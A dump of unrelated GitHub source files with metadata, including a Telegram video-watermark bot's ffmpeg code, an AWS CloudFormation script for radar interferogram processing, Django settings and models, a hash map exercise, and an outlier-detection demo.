/DataSc/env/bin/jupyter-nbextension
|
96db8eb69e567d87cde671a4a9cf7b4afceff74a
|
[] |
no_license
|
mannann/minacs50
|
5c76d9d0393d070a6a46da667a3de16829757ca5
|
14cbe1a7de1623696acd10eaf101752065755f7a
|
refs/heads/master
| 2020-05-20T18:25:11.894824 | 2019-05-09T03:18:16 | 2019-05-09T03:18:16 | 185,703,311 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 252 |
#!/home/ubuntu/workspace/DataSc/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from notebook.nbextensions import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"ubuntu@6cea0f54ee0b"
] |
ubuntu@6cea0f54ee0b
|
|
88dacaa17e2b271dcad8fc79b31696d64d78931d
|
f49a4da9605020b09b38d342c305732002cbcdcd
|
/core/ffmpeg.py
|
26e7d025894b999ac830175257f44b4eb6c25226
|
[
"MIT"
] |
permissive
|
hbhammaddyar0/TG-Watermark-bot
|
334fd245910eb1e329d61b2bdffcb7686f83b373
|
c98a249f6789131777cfb76d0123f1744dc354ad
|
refs/heads/main
| 2023-06-07T15:38:37.907890 | 2021-06-17T06:29:46 | 2021-06-17T06:29:46 | 377,711,167 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,926 |
py
|
# (c) @hbhammaddyar
# This is Telegram Video Watermark Adder Bot's Source Code.
# I Hardly Made This. So Don't Forget to Give Me Credits.
# Done this Huge Task for Free. If you guys not support me,
# I will stop making such things!
# Edit anything at your own risk!
# Don't forget to help me if I done any mistake in the codes.
# Support Group: @kdramashindi
# Bots Channel: @hbhammaddyar0
import os
import math
import re
import json
import subprocess
import time
import shlex
import asyncio
from configs import Config
from typing import Tuple
from humanfriendly import format_timespan
from core.display_progress import TimeFormatter
from pyrogram.errors.exceptions.flood_420 import FloodWait
async def vidmark(the_media, message, working_dir, watermark_path, output_vid, total_time, logs_msg, status, mode, position, size):
file_genertor_command = [
"ffmpeg",
"-hide_banner",
"-loglevel",
"quiet",
"-progress",
working_dir,
"-i",
the_media,
"-i",
watermark_path,
"-filter_complex",
f"[1][0]scale2ref=w='iw*{size}/100':h='ow/mdar'[wm][vid];[vid][wm]overlay={position}",
"-c:v",
"h264",
"-preset",
mode,
"-tune",
"film",
"-c:a",
"copy",
output_vid
]
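    # [1][0]scale2ref resizes the watermark (input 1) to `size` percent of the
    # reference video's width, with h='ow/mdar' preserving the watermark's own
    # aspect ratio; overlay then pastes it at the given position expression.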
COMPRESSION_START_TIME = time.time()
process = await asyncio.create_subprocess_exec(
*file_genertor_command,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
with open(status, 'r+') as f:
statusMsg = json.load(f)
statusMsg['pid'] = process.pid
f.seek(0)
json.dump(statusMsg, f, indent=2)
while process.returncode != 0:
await asyncio.sleep(5)
with open(working_dir, 'r+') as file:
text = file.read()
            frame = re.findall(r"frame=(\d+)", text)
            time_in_us = re.findall(r"out_time_ms=(\d+)", text)
            progress = re.findall(r"progress=(\w+)", text)
            speed = re.findall(r"speed=(\d+\.?\d*)", text)
            frame = int(frame[-1]) if frame else 1
            speed = speed[-1] if speed else 1
            time_in_us = time_in_us[-1] if time_in_us else 1
if len(progress):
if progress[-1] == "end":
break
execution_time = TimeFormatter((time.time() - COMPRESSION_START_TIME)*1000)
elapsed_time = int(time_in_us)/1000000
difference = math.floor( (total_time - elapsed_time) / float(speed) )
ETA = "-"
if difference > 0:
ETA = TimeFormatter(difference*1000)
percentage = math.floor(elapsed_time * 100 / total_time)
progress_str = "📊 **Progress:** {0}%\n`[{1}{2}]`".format(
round(percentage, 2),
''.join(["▓" for i in range(math.floor(percentage / 10))]),
''.join(["░" for i in range(10 - math.floor(percentage / 10))])
)
stats = f'📦️ **Adding Watermark [Preset: `{mode}`]**\n\n' \
f'⏰️ **ETA:** `{ETA}`\n❇️ **Position:** `{position}`\n🔰 **PID:** `{process.pid}`\n🔄 **Duration: `{format_timespan(total_time)}`**\n\n' \
f'{progress_str}\n'
try:
await logs_msg.edit(text=stats)
await message.edit(text=stats)
except FloodWait as e:
await asyncio.sleep(e.x)
pass
except:
pass
stdout, stderr = await process.communicate()
e_response = stderr.decode().strip()
t_response = stdout.decode().strip()
print(e_response)
print(t_response)
if os.path.lexists(output_vid):
return output_vid
else:
return None
async def take_screen_shot(video_file, output_directory, ttl):
# https://stackoverflow.com/a/13891070/4723940
out_put_file_name = output_directory + \
"/" + str(time.time()) + ".jpg"
file_genertor_command = [
"ffmpeg",
"-ss",
str(ttl),
"-i",
video_file,
"-vframes",
"1",
out_put_file_name
]
# width = "90"
process = await asyncio.create_subprocess_exec(
*file_genertor_command,
# stdout must a pipe to be accessible as process.stdout
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
# Wait for the subprocess to finish
stdout, stderr = await process.communicate()
e_response = stderr.decode().strip()
t_response = stdout.decode().strip()
if os.path.lexists(out_put_file_name):
return out_put_file_name
else:
return None
|
[
"noreply@github.com"
] |
hbhammaddyar0.noreply@github.com
|
608f07046d35b8cdb5eff5795a164e522ef0ea84
|
e81fa4692ef5a170aa597c814d648d500d1913fe
|
/bin/proc_ifg_cfn_exp.py
|
4b7bebd0e6856b14f84c601ea5e368d484261df8
|
[
"MIT"
] |
permissive
|
wayne128/dinoSARaws
|
dc905c1ea591831c6c07a432352a51182d3c83d0
|
2b1bd017dfc0059817e22d739392c1ed6cc8d77a
|
refs/heads/master
| 2020-06-12T02:26:47.243620 | 2018-12-17T01:21:47 | 2018-12-17T01:21:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,412 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
EXPERIMENTING WITH NEW CLOUD FORMATION SETTINGS
- send email when process begins and completes
- run interferogram using spot market
Note: intended for single interferogram processing. For batch processing
figure out how to store common data and DEM on an EFS drive
# EXAMPLE:
proc_ifg_cfn.py -i c4.4xlarge -p 115 -m 20170927 -s 20170915 -n 2 -r 44.0 44.5 -122.0 -121.5 -g 44.0 44.5 -122.0 -121.5
c4.4xlarge
# Archived Files:
*xml *log
#filt_topophase.unw* filt_topophase.flat* dem.crop* los.rdr.geo* phsig.cor.geo*
# For now just stash entire meged directory
Created on Sun Nov 19 16:26:27 2017
@author: scott
"""
import argparse
import os
def cmdLineParse():
'''
Command line parser.
'''
parser = argparse.ArgumentParser( description='prepare ISCE 2.1 topsApp.py')
parser.add_argument('-m', type=str, dest='master', required=True,
help='Master date')
parser.add_argument('-s', type=str, dest='slave', required=True,
help='Slave date')
parser.add_argument('-p', type=int, dest='path', required=True,
help='Path/Track/RelativeOrbit Number')
parser.add_argument('-i', type=str, dest='instance', required=False, default='t2.micro',
help='EC2 instance type (c4.4xlarge, t2.micro...)')
parser.add_argument('-n', type=int, nargs='+', dest='swaths', required=False,
default=[1,2,3], choices=(1,2,3),
help='Subswath numbers to process')
parser.add_argument('-r', type=float, nargs=4, dest='roi', required=False,
metavar=('S','N','W','E'),
help='Region of interest bbox [S,N,W,E]')
parser.add_argument('-g', type=float, nargs=4, dest='gbox', required=False,
metavar=('S','N','W','E'),
help='Geocode bbox [S,N,W,E]')
return parser.parse_args()
def create_cloudformation_script(inps):
'''
Write YML file to process and interferogram based on user input
NOTE: could probably do this better w/ JSON tools...
'''
filename = 'proc-{master}-{slave}.yml'.format(**vars(inps))
with open(filename, 'w') as yml:
yml.write('''AWSTemplateFormatVersion: "2010-09-09"
Description: "CloudFormation template to create interferogram: int-{master}-{slave}"
Resources:
MyEC2Instance:
Type: "AWS::EC2::Instance"
Properties:
ImageId: "ami-8deb36f5"
InstanceType: "{instance}"
KeyName: "isce-key"
SecurityGroups: ["isce-sg",]
BlockDeviceMappings:
-
DeviceName: /dev/sda1
Ebs:
VolumeType: gp2
VolumeSize: 8
DeleteOnTermination: true
-
DeviceName: /dev/xvdf
Ebs:
VolumeType: gp2
VolumeSize: 100
DeleteOnTermination: true
UserData:
'Fn::Base64': !Sub |
#!/bin/bash
# add -xe to above line for debugging output to /var/log/cloud-init-output.log
# create mount point directory NOTE all commands run as root
#mkdir /mnt/data
# create ext4 filesystem on new volume
mkfs -t ext4 /dev/xvdf
# add an entry to fstab to mount volume during boot
echo "/dev/xvdf /mnt/data ext4 defaults,nofail 0 2" >> /etc/fstab
# mount the volume on current boot
mount -a
chown -R ubuntu /mnt/data
sudo -i -u ubuntu bash <<"EOF"
export PATH="/home/ubuntu/miniconda3/envs/isce-2.1.0/bin:/home/ubuntu/.local/bin:$PATH"
export GDAL_DATA=/home/ubuntu/miniconda3/envs/isce-2.1.0/share/gdal
source /home/ubuntu/ISCECONFIG
# Make directories for processing - already in AMI
cd /mnt/data
mkdir dems poeorb auxcal
# Get the latest python scripts from github & add to path
git clone https://github.com/scottyhq/dinoSAR.git
export PATH=/mnt/data/dinoSAR/bin:$PATH
echo $PATH
# Download inventory file
get_inventory_asf.py -r {roi}
# Prepare interferogram directory
prep_topsApp.py -i query.geojson -p {path} -m {master} -s {slave} -n {swaths} -r {roi} -g {gbox}
# Run code
cd int-{master}-{slave}
topsApp.py 2>&1 | tee topsApp.log
# Create S3 bucket and save results
aws s3 mb s3://int-{master}-{slave}
cp *xml *log merged
aws s3 sync merged/ s3://int-{master}-{slave}/
# Close instance
EOF
echo "Finished interferogram... shutting down"
#shutdown #doesn't close entire stack
aws cloudformation delete-stack --stack-name proc-{master}-{slave}
'''.format(**vars(inps)))
return filename
def launch_stack(template):
'''
launch AWS CloudFormationStack
'''
name = template[:-4]
cmd = 'aws cloudformation create-stack --stack-name {0} --template-body file://{1}'.format(name,template)
print(cmd)
os.system(cmd)
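    # stack progress can then be polled with the standard CLI (not part of
    # this script):
    #   aws cloudformation describe-stacks --stack-name <name> \
    #       --query 'Stacks[0].StackStatus'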
if __name__ == '__main__':
inps = cmdLineParse()
inps.roi = ' '.join([str(x) for x in inps.roi])
inps.gbox = ' '.join([str(x) for x in inps.gbox])
inps.swaths = ' '.join([str(x) for x in inps.swaths])
template = create_cloudformation_script(inps)
print('Running Interferogram on EC2')
launch_stack(template)
print('EC2 should close automatically when finished...')
|
[
"scottyhq@gmail.com"
] |
scottyhq@gmail.com
|
dec6c0c42f0bad8ce00df0e0e3289617fbecf922
|
e06161af1bafac937d3479d9f21bb58a25c571cb
|
/2d_array_take2.py
|
fad226c927eb34864e66927113a552d261d115a2
|
[] |
no_license
|
mdayunus/dsa-in-py
|
641a4a1728fdb8b7c7aa70152a34922a64b7c096
|
6776e9927e85c0a81091190f3f2d0fa12d74a767
|
refs/heads/master
| 2023-04-17T08:32:40.259202 | 2021-05-07T22:42:52 | 2021-05-07T22:42:52 | 364,181,378 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 486 |
py
|
def simple(a):
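    # sum every 3x3 "hourglass" (top row + centre cell + bottom row) in the
    # 6x6 grid and keep the maximum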
maxi = 0
for i in range(1,5):
for j in range(1,5):
insum = a[i-1][j-1]+a[i-1][j]+a[i-1][j+1]+a[i][j]+a[i+1][j-1]+a[i+1][j]+a[i+1][j+1]
if insum > maxi:
maxi = insum
return maxi
if __name__ == '__main__':
a = [
[1, 1, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[0, 0, 2, 4, 4, 0],
[0, 0, 0, 2, 0, 0],
[0, 0, 1, 2, 4, 0],
]
print(simple(a))
|
[
"mdayunus@gmail.com"
] |
mdayunus@gmail.com
|
bb2ddd0cc7eed6fb5c05708a37f3d838e9e6a58d
|
a5901321e965a12ed476899e69e5793b007f32b1
|
/tristan-TristanD/week-8/flask-intro/.env/bin/pip
|
1edc68b36e2942b1b903f0e8ea8863e553709615
|
[] |
no_license
|
trrstnn/sf-wdi-51-assignments
|
4161483fd3aa8f81d63bf3503163b701bcee559d
|
6ea3057e683a1c5c87230afd08efad73957f7bd8
|
refs/heads/master
| 2020-04-18T04:35:36.605552 | 2019-03-22T05:03:22 | 2019-03-22T05:03:22 | 167,245,007 | 0 | 0 | null | 2019-01-23T19:56:49 | 2019-01-23T19:56:48 | null |
UTF-8
|
Python
| false | false | 272 |
#!/Users/trizzy/Desktop/wdi/exercises/week-8/flask-intro/.env/bin/python3.7
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"edeclarin@gmail.com"
] |
edeclarin@gmail.com
|
|
be170dcc3bdd5793fcc52084d7dd6184d1ea3928
|
51aa2894c317f60726fe9a778999eb7851b6be3e
|
/120_design_patterns/014_command/_exercises/templates/4-Command Pattern/Assignment/Solution/security_commands.py
|
dccb3920efff4cf8a244e3bb8df5cf9715871ec1
|
[] |
no_license
|
pranaymate/Python_Topics
|
dd7b288ab0f5bbee71d57080179d6481aae17304
|
33d29e0a5bf4cde104f9c7f0693cf9897f3f2101
|
refs/heads/master
| 2022-04-25T19:04:31.337737 | 2020-04-26T00:36:03 | 2020-04-26T00:36:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 455 |
py
|
# ____ a__.s... ______ S..
# ____ c_a.. ______ AC..
#
#
# c_ SecurityArmCommand AC..
# ___ - security
# __ no. isi.. ? S..
# r_ T..
# ? ?
#
# ___ execute
# s____.a..
#
# ___ undo(
# s___.di..
#
#
# c_ SecurityDisarmCommand(AbsCommand):
# ___ - security
# __ no. isi.. ? S..
# r_ T..
# ? ?
#
# ___ execute
# s___.di..
#
# ___ undo
# s___.a..
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
76b7b7fd8b8e98790d7b81290bc4cc77bea998c9
|
a74a592d3e34c0cb2e19363a92410c520dc0ecda
|
/backend/course/models.py
|
1ed6ffe755403a8dcb6cbf4e3dc54d87f002688f
|
[] |
no_license
|
crowdbotics-apps/youthbuild-course-a-18675
|
5e4f0231b6127b215576c87593b8a073518200de
|
4f17bfa2f588be23f24d862ca86fba569908e90e
|
refs/heads/master
| 2022-11-08T20:55:36.094513 | 2020-07-07T19:33:25 | 2020-07-07T19:33:25 | 277,903,947 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,850 |
py
|
from django.conf import settings
from django.db import models
class Course(models.Model):
"Generated Model"
author = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="course_author",
)
title = models.CharField(null=True, blank=True, max_length=256,)
description = models.TextField(null=True, blank=True,)
categories = models.ManyToManyField(
"course.Category", blank=True, related_name="course_categories",
)
class Lesson(models.Model):
"Generated Model"
module = models.ForeignKey(
"course.Module", on_delete=models.CASCADE, related_name="lesson_module",
)
title = models.CharField(max_length=256,)
description = models.TextField()
media = models.URLField()
class Category(models.Model):
"Generated Model"
name = models.CharField(max_length=256,)
class Enrollment(models.Model):
"Generated Model"
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="enrollment_user",
)
course = models.ForeignKey(
"course.Course", on_delete=models.CASCADE, related_name="enrollment_course",
)
class Event(models.Model):
"Generated Model"
name = models.CharField(max_length=256,)
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="event_user",
)
date = models.DateTimeField()
class Module(models.Model):
"Generated Model"
course = models.ForeignKey(
"course.Course", on_delete=models.CASCADE, related_name="module_course",
)
title = models.CharField(max_length=256,)
description = models.TextField()
class SubscriptionType(models.Model):
"Generated Model"
name = models.CharField(max_length=256,)
class Recording(models.Model):
"Generated Model"
event = models.ForeignKey(
"course.Event", on_delete=models.CASCADE, related_name="recording_event",
)
media = models.URLField()
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="recording_user",
)
published = models.DateTimeField()
class Group(models.Model):
"Generated Model"
name = models.CharField(max_length=256,)
class Subscription(models.Model):
"Generated Model"
subscription_type = models.ForeignKey(
"course.SubscriptionType",
on_delete=models.CASCADE,
related_name="subscription_subscription_type",
)
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="subscription_user",
)
class PaymentMethod(models.Model):
"Generated Model"
user = models.ForeignKey(
"users.User", on_delete=models.CASCADE, related_name="paymentmethod_user",
)
primary = models.BooleanField()
token = models.CharField(max_length=256,)
# Create your models here.
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
19d3b612fa87b5b0dcdf3f23ddece88b33ff1990
|
6f496bd9095d232002440401655535c77def0d97
|
/problem1.py
|
94a522f3c16b4ec8cdc399a0c12ede621546ef98
|
[] |
no_license
|
kartavyabhatts30/Design-1
|
357aa23a8be518a331037bd651dde76412262597
|
0677c410142a130263f7865a1ed5cd52290dfd39
|
refs/heads/master
| 2022-11-22T04:40:59.934246 | 2020-07-22T04:46:46 | 2020-07-22T04:46:46 | 277,712,921 | 0 | 0 | null | 2020-07-07T04:04:58 | 2020-07-07T04:04:57 | null |
UTF-8
|
Python
| false | false | 2,040 |
py
|
# Time Complexity : O(n/b) on average per operation (b = 1000 buckets)
# Space Complexity : O(n + b) for n stored keys
# Did this code successfully run on Leetcode :
# Any problem you faced while coding this :
# Your code here along with comments explaining your approach
class linkedListNode:
    def __init__(self, k, v):
        self.key = k
        self.value = v
        self.next = None


class MyHashMap:

    def __init__(self):
        """
        Initialize your data structure here.
        """
        # each bucket starts with a dummy head node, so put/get/remove never
        # have to special-case an empty chain or the first real node
        self.hashMap = [linkedListNode(None, None) for _ in range(1000)]

    def put(self, key: int, value: int) -> None:
        """
        value will always be non-negative.
        """
        prev = self.getPrev(self.hashMap[key % 1000], key)
        if prev.next is None:
            prev.next = linkedListNode(key, value)
        else:
            prev.next.value = value  # key already present: overwrite

    def get(self, key: int) -> int:
        """
        Returns the value to which the specified key is mapped, or -1 if this map contains no mapping for the key
        """
        prev = self.getPrev(self.hashMap[key % 1000], key)
        if prev.next is None:
            return -1
        return prev.next.value

    def remove(self, key: int) -> None:
        """
        Removes the mapping of the specified value key if this map contains a mapping for the key
        """
        prev = self.getPrev(self.hashMap[key % 1000], key)
        if prev.next is not None:
            prev.next = prev.next.next

    def getPrev(self, head, key):
        # walk the chain and return the node *before* the one holding key,
        # or the last node when the key is absent
        prev = head
        while prev.next is not None and prev.next.key != key:
            prev = prev.next
        return prev
# Your MyHashMap object will be instantiated and called as such:
key, value = 10023, 65461
obj = MyHashMap()
obj.put(key,value)
param_2 = obj.get(key)
print(param_2)
obj.remove(key)
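print(obj.get(key))  # expected: -1 once the key has been removed (added check)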
|
[
"bkartavya07@gmail.com"
] |
bkartavya07@gmail.com
|
d45bc129e292a1e9f115213dcfce753bb1df6867
|
cfce575e6eb1bed6ba4cfcc457f32c396d62f2fc
|
/settings.py
|
fa55a701de2fc0a0d12d69742b2a1dca4ccd6585
|
[] |
no_license
|
Bligh-Park/mysite
|
3edf7f18dc85e5418b3b3ad5c2212101658e44b1
|
7c21ff9b81aa03dd64f3d57357280e69a21fe97c
|
refs/heads/master
| 2021-01-20T06:42:42.209083 | 2017-05-01T07:51:08 | 2017-05-01T07:51:08 | 89,910,962 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,331 |
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'bpe@xbij_g9s*v#xz_7)%3b%s1e_z0$p!w+8tqd64r84mlw$o&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'bookmark.apps.BookmarkConfig',
'blog.apps.BlogConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
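# Serving MEDIA_* during development needs a matching urls.py entry.
# A minimal sketch (assumes the standard Django 1.11 pattern; not part of
# this settings file itself):
#   from django.conf import settings
#   from django.conf.urls.static import static
#   urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)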
|
[
"sy131.park@gmail.com"
] |
sy131.park@gmail.com
|
a3b0628f021f81f748f640274f9ddface28f23ea
|
500b03fa6cb776c1d51db4a3a3aa252ddf5a50e6
|
/book_exercise/py_intro/basics/Chapter 4: If statement/num_close.py
|
d5a70064327dbf0d92c9c632d600f35af5edadad
|
[] |
no_license
|
carloslvm/learning-python
|
b3796a0a5b751baae8c551a9f6fe262f98980691
|
07f885454cf21b7d215a58da7fcb907715e546bd
|
refs/heads/master
| 2022-07-27T21:39:11.937801 | 2022-07-09T17:47:56 | 2022-07-09T17:47:56 | 163,447,616 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 364 |
py
|
#!/usr/bin/python3
# Guessing a float number
num = 10.000
user_num = float(input('Try to guess the float number: '))
# Check the exact match before the near-miss values; otherwise the
# equality branch can never fire.
if user_num == num:
    print('That\'s correct.')
elif user_num == 10.001 or user_num == 9.999:
    print('You were close.')
else:
    print('You were not close.')
|
[
"cvaldez553@gmail.com"
] |
cvaldez553@gmail.com
|
c295ac822210fac2e47f1c17e39c91b6cf211895
|
63b833d7f84cfea52f5f897c8f6419096b38d9c6
|
/LOF_iF_test.py
|
d6fd144e269a931c2ad9e3dee6918d4dd07221df
|
[] |
no_license
|
jywang2016/Modelica-related-code
|
f1be6bf9b3b33145cd4d4cba5093c0a9b424f9d3
|
3098383c121b80bfe7715020eb045e85edb030f0
|
refs/heads/master
| 2022-03-15T06:58:53.342384 | 2019-10-28T21:28:48 | 2019-10-28T21:28:48 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,654 |
py
|
## General imports
import numpy as np
import pandas as pd
import os,inspect
import math
# Get this current script file's directory:
loc = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
# Set working directory
os.chdir(loc)
os.chdir('..') # parent directory
from myFunctions import gen_FTN_data
from meSAX import *
os.chdir(loc) # change back to loc
# from dtw_featurespace import *
# from dtw import dtw
# from fastdtw import fastdtw
# to avoid tk crash
import matplotlib
matplotlib.use('Qt5Agg')
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
## generate data
# set random seed
np.random.seed(0)
# my sample data
x_mean1 = 0
y_mean1 = 0
x_mean2 = 45
y_mean2 = 13
x_mean3 = 7
y_mean3 = 40
N1 = 100
N2 = 100
N3 = 100
# coords1 = np.random.uniform(0,12,(N1,2))
# coords2 = np.random.uniform(0,5,(N2,2))
coords1 = np.random.randn(N1,2) * 16
coords2 = np.random.randn(N2,2) * 4
coords3 = np.random.randn(N3,2) * 1
outliers = np.array([15,15,23,12]).reshape(2,2)
coords = np.empty((N1+N2+N3+outliers.shape[0],2))
coords[:N1] = coords1 + (x_mean1,y_mean1)
coords[N1:(N1+N2)] = coords2 + (x_mean2,y_mean2)
coords[(N1+N2):-2] = coords3 + (x_mean3,y_mean3)
coords[-2:] = outliers
# # sklearn example data
# n_points_per_cluster = 250
#
# C1 = [-5, -2] + .8 * np.random.randn(n_points_per_cluster, 2)
# C2 = [4, -1] + .1 * np.random.randn(n_points_per_cluster, 2)
# C3 = [1, -2] + .2 * np.random.randn(n_points_per_cluster, 2)
# C4 = [-2, 3] + .3 * np.random.randn(n_points_per_cluster, 2)
# C5 = [3, -2] + 1.6 * np.random.randn(n_points_per_cluster, 2)
# C6 = [5, 6] + 2 * np.random.randn(n_points_per_cluster, 2)
# coords = np.vstack((C1, C2, C3, C4, C5, C6))
##
from sklearn.neighbors import LocalOutlierFactor
from sklearn.ensemble import IsolationForest
LOF = LocalOutlierFactor(n_neighbors=20)
iForest = IsolationForest()
lof_labels = LOF.fit_predict(coords)  # fit_predict fits and labels in one pass
iForest.fit(coords)
iforest_labels = iForest.predict(coords)
lof_scores = LOF.negative_outlier_factor_
if_scores = iForest.decision_function(coords)
# LOF.threshold_ and iForest.threshold_ are read directly in the hlines calls below.
# plot normalized scores
plt.figure()
plt.plot((lof_scores - np.mean(lof_scores))/np.std(lof_scores))
plt.plot((if_scores - np.mean(if_scores))/np.std(if_scores))
plt.hlines((LOF.threshold_ - np.mean(lof_scores))/np.std(lof_scores),xmin=0,xmax=coords.shape[0],color='steelblue')
plt.hlines((iForest.threshold_ - np.mean(if_scores))/np.std(if_scores),xmin=0,xmax=coords.shape[0],color='coral')
plt.show()
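# Quick cross-check (a sketch added for illustration): points that both
# detectors label -1 are their joint outliers; the two injected points
# near (15, 15) and (23, 12) should be among them.
joint_outliers = coords[(lof_labels == -1) & (iforest_labels == -1)]
print('Jointly flagged outliers:\n', joint_outliers)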
|
[
"noreply@github.com"
] |
jywang2016.noreply@github.com
|
7cb899c9ef10872fd3b76e309dcb6ff0b2775ec2
|
3474e05ca41d697e8500981a81f195131031afb7
|
/src/constants.py
|
2283c18620165e5ce7e43e7bf4defee2837fc6ef
|
[
"BSD-3-Clause"
] |
permissive
|
mayadeh-kooti/mne-bids-pipeline-runner
|
1a3458659d9b2b690a63c12828d9618c910c66df
|
8690c438c2a45c37fdd66d20c0a8794f028a0dbb
|
refs/heads/main
| 2023-05-04T16:06:51.855304 | 2021-05-26T09:00:27 | 2021-05-26T09:00:27 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 60 |
py
|
GIT_REPO_URI = 'git@github.com:mne-tools/mne-bids-pipeline'
|
[
"richard.hoechenberger@gmail.com"
] |
richard.hoechenberger@gmail.com
|
207c6ccefcf7af5a19bcab4956f9c8cf3e50ddbb
|
5705b51fa12e7edb9ad0eae55f4de92aaddf43e4
|
/parser_CAML.py
|
9bdf909fadcca73b8b3bb849f6af41270b27621a
|
[] |
no_license
|
Complex-data/Predicting-Restaurant-Closure-Through-Deep-Concept-Explainable-Model
|
c05253e5f522ed29c22beb79fcd7f0d477c9b623
|
3bdd5fc1bef162790f4d53e2ab770cf1a41acc71
|
refs/heads/master
| 2020-09-26T09:55:27.292035 | 2020-05-19T07:21:48 | 2020-05-19T07:21:48 | 226,231,047 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 12,349 |
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
def build_parser():
""" This function produces the default argparser.
    Note that NOT all args are actively used: this is a generic
    argparser shared across projects, so some options here are unused.
    The important arguments are documented in the main readme.
"""
parser = argparse.ArgumentParser()
ps = parser.add_argument
ps("--dataset", dest="dataset", type=str,
default='dianping', help="Which dataset?")
ps("--rnn_type", dest="rnn_type", type=str, metavar='<str>',
default='RAW_MSE_CAML_FN_FM', help="Compositional model name")
ps("--opt", dest="opt", type=str, metavar='<str>', default='Adam',
help="Optimization algorithm)")
ps("--emb_size", dest="emb_size", type=int, metavar='<int>',
default=30, help="Embeddings dimension (default=50)")
ps("--rnn_size", dest="rnn_size", type=int, metavar='<int>',
default=30, help="model-specific dimension. (default=50)")
ps("--rnn_dim", dest="rnn_dim", type=int, metavar='<int>',
default=30, help="model-specific dimension. (default=50)")
ps("--latent_size", dest="latent_size", type=int, metavar='<int>',
default=30, help="latent factor dimension for user/items. (default=50)")
ps("--key_word_lambda", dest="key_word_lambda", type=float, metavar='<float>',
default=1.0, help="The key word generation loss weight.")
ps("--use_lower", dest="use_lower", type=int, metavar='<int>',
default=1, help="Use all lowercase")
ps("--batch-size", dest="batch_size", type=int, metavar='<int>',
default=128, help="Batch size (default=128)")
